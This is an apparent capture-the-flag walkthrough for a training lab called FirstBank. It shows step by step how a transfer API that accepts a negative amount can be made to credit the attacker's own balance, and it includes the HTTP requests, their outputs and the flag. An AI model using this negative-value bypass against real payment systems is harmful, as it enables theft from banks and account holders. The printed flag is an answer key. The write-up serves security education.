HACKR.GG
hackr.gg — Transfer Funds — FirstBank Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Transfer Funds — FirstBank

Business Logic Flaws · Negative Value / Business Logic Bypass
Difficulty
Intermediate
Vuln class
Negative Value / Business Logic Bypass
Steps
4
// Objective
Exploit FirstBank's transfer API by sending a negative amount — causing the system to add funds to your account instead of deducting them.
// Tools required
BrowserDeveloper ToolsBurp Suitecurl
// Step-by-step walkthrough
1
Perform a normal transfer
Log in and navigate to Transfer Funds. Send $1 to account 99999 and observe the request.
Command / Input
POST /api/transfer Content-Type: application/json {"from":"20001","to":"99999","amount":1}
Output
{"status":"success","newBalance":999}
2
Understand the vulnerability
The server deducts the amount from the sender and adds it to the recipient. If the server does not validate that amount > 0, a negative number reverses the direction — it adds funds to the sender and deducts from the recipient.
This is a classic business logic flaw. The code likely does: balance[from] -= amount; balance[to] += amount; With amount = -100, this becomes: from gains 100, to loses 100.
3
Send a negative amount
Intercept the transfer request and change the amount to a negative number.
Command / Input
POST /api/transfer {"from":"20001","to":"99999","amount":-500}
Output
{"status":"success","newBalance":1500}
Your balance increased by $500 instead of decreasing. The transfer ran in reverse.
4
Retrieve the flag
After a successful negative transfer, the flag appears in the transaction confirmation or your account dashboard.
Output
HackrGG{f1rstb4nk_n3g4t1v3_tr4nsf3r}
// Flag
Flag value
HackrGG{f1rstb4nk_n3g4t1v3_tr4nsf3r}
Displayed in the transaction confirmation after the negative-amount transfer succeeds.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute